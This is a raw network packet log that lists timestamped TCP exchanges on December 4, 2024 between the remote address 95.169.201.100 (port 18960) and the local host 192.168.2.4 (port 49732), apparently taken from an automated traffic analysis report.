                                                                                                                                                      Dec 4, 2024 13:58:19.146864891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.146946907 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.147180080 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.152184963 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.152308941 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.152821064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.153579950 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.157105923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.157211065 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.157733917 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.161767960 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.161911011 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.161978006 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.162797928 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.162967920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.163350105 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.163851023 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.163983107 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.164033890 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.164942980 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.165090084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.165139914 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.166245937 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.166469097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.166515112 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.167325974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.167438984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.167531967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.168564081 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.168659925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.168829918 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.169553995 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.169666052 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.169795990 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.170363903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.170439005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.170537949 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.171302080 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.171425104 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.171483040 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.172382116 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.172471046 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.172511101 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.173423052 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.173552036 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.173593998 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.175044060 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.175055027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.175154924 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.175755024 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.175801992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.175848007 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.176641941 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.176757097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.176829100 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.177817106 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.177933931 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.177983046 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.178952932 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.179100990 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.179495096 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.179768085 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.179853916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.179909945 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.180825949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.180927038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.181005001 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.181965113 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.182064056 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.182199001 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.182941914 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.183017969 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.183948040 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.184067011 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.184118986 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.185046911 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.185153961 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.186229944 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.186288118 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.186363935 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.186682940 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.187211990 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.187308073 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.188688040 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.188777924 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.188838005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.189184904 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.189476013 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.189591885 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.190560102 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.190663099 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.190675020 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.191502094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.191679001 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.191871881 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.192812920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.192864895 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.192904949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.193891048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.193999052 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.194048882 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.195126057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.195240974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.195287943 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.196257114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.196422100 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.197221041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.197273970 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.197309017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.197457075 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.198165894 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.198338032 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.198400974 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.199078083 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.199173927 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.199227095 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.199925900 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.200012922 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.200076103 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.201067924 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.201200008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.201889038 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.202034950 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.202147961 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.202189922 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.202877998 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.202991009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.203802109 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.203846931 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.203876019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.204807043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.204848051 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.204916954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.205770969 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.205811024 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.205822945 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.206657887 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.206698895 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.206768990 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.207256079 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.207488060 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.207597017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.208156109 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.208200932 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.208234072 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.208940983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.209085941 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.209129095 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.209880114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.209980965 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.210197926 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.210617065 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.210761070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.210802078 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.211409092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.211559057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.211600065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.212253094 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.212358952 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.212399006 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.213097095 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.213254929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.213296890 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.214066982 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.214181900 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.214869022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.214916945 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.214993000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.215382099 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.215545893 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.215698004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.215818882 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.216397047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.216475010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.216562986 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.217109919 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.217278004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.217511892 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.217916012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.218086004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.218197107 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.218743086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.218835115 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.219013929 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.219531059 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.219630957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.219877005 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.220307112 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.220573902 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.220633030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.221292019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.221466064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.221518993 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.222068071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.222243071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.222313881 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.222897053 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.223006964 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.223172903 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.223855972 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.223956108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.224061966 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.224721909 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.224833965 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.224953890 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.225550890 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.225799084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.225939989 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.226710081 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.226836920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.226978064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.227771044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.228044033 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.228104115 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.228583097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.228661060 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.228750944 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.229541063 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.229584932 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.229778051 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.230115891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.230333090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.230428934 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.230917931 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.231020927 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.231566906 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.231796026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.231928110 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.231971979 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.232559919 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.232683897 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.232728958 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.233289003 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.233391047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.233584881 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.234031916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.234193087 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.234235048 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.234728098 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.234837055 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.234967947 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.235495090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.235641003 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.235712051 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.236265898 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.236407042 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.236812115 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.237015963 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.237096071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.237430096 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.237659931 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.237765074 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.237808943 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.238611937 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.238751888 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.238799095 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.239417076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.239574909 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.240075111 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.240144968 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.240242958 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.240297079 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.240892887 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.240952015 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.241492033 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.241506100 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.241578102 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.241636992 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.242219925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.242257118 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.242309093 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.242863894 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.242949009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.242990971 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.243472099 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.243524075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.244033098 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.244292974 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.244415045 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.244484901 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.244957924 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.245073080 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.245209932 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.245800018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.245982885 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.246025085 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.246592045 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.246803999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.246850014 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.247487068 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.247611046 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.247667074 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.248559952 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.248647928 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.248816967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.249164104 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.249258995 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.249304056 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:19.249912977 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:19.249989986 CET189604973295.169.201.100192.168.2.4
